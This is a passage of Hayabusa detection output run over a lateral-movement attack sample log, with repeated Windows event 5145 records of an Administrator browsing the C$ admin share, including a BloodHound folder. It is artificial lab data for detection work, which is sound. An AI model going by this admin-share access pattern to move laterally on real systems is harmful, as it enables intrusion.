Users\Public\Pictures\Sample Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\Sample Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\Sample Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\Sample Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded 
TV\Sample Media\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV\Sample Media : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Downloads\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Videos\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Links : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Links\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Documents : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Pictures : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Music\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Contacts : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\locales : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors\DebugBuilds : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ 
